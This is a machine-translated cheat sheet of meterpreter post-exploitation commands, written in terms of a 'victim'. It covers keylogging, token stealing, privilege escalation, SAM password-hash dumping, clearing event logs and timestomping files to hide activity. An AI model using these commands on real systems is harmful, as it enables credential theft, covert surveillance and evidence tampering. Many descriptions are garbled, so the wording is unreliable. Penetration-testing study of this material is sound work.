Step 1: Core Command
In its most basic use, meterpreter is on a Linux computer terminal in the victim. In this way, many of our basic Linux commands can be used in meterpreter even in a window or other operating systems.
Here are a few core commands can be used in meterpreter.
? - Help menu
background - the background of the current session to move
bgkill - kill a background meterpreter script
bglist - provides a list of all background running scripts
bgrun - as a background thread running scripts
channel - display Active Channel
close - close the channel
exit - terminate the session meterpreter
help - Help menu
interact - to interact with the channel
irb - into the Ruby script mode
migrate - to move to a specified PID of active processes
quit - terminates the session meterpreter
read - data read from channel
run - after the implementation of its selected meterpreter script
use - extension of load meterpreter
write - to write data into a channel
Step 2: File System Commands
cat - read and output to the standard output file
cd - change directory to the victim
del - delete files on the victim
download- downloaded from the victim system files
edit- edit files with vim
getlwd - local directory Print
getwd - print working directory
lcd - change the local directory
lpwd - local directory Print
ls - lists the files in the current directory
mkdir - create a directory on the victim's system
pwd - Output working directory
rm - delete files
rmdir - remove a directory on the victim's system
upload- from the attacker to the victim's system files to upload system
Step 3: Network command
ipconfig - network interface displays key information, including the IP address, and so on.
portfwd - port forwarding
route - view or modify the routing table victims
Step 4: System Command
clearav - Clear the event log on the victim's computer
drop_token - stolen token
execute- Run
getpid - gets the current process ID (PID)
getprivs - to get as many privileges as possible
getuid - get the user to run as a server
kill - terminate the process specified PID
ps - list the processes running
reboot- restart the victim's computer
reg - interact with the registry of the victim
rev2self - call RevertToSelf on the victim machine ()
shell - a shell open on the victim's computer
shutdown- closed the victim's computer
steal_token - trying to steal specified (PID) process token
sysinfo - get detailed information about the victim and the name of the computer operating system, etc.
Step 5: The user interface command
enumdesktops - lists all accessible desktop
getdesktop - Get the current meterpreter Desktop
idletime - check a long time, the victim System Idle Process
keyscan_dump - keylogger content dump
keyscan_start - when you start with a process such as Word or browser associated with the keylogger
keyscan_stop - Stop keyloggers
screenshot- arrested desktop screenshot meterpreter
set_desktop - Change meterpreter Desktop
uictl - enabled user interface components of some controls
Step 6: privilege escalation command
getsystem - to obtain system administrator privileges
Step 7: Password dump command
hashdump - value arrested and hashed password (SAM) file
Please note hashdump will skip anti-virus software, but now there are two scripts that are more subtle, "run hashdump" and "run smart_hashdump". Find out more about those in my script meterpreter upcoming cheating.
Step 8: Timestomp command
timestomp - operating modify, access, and create a file's attributes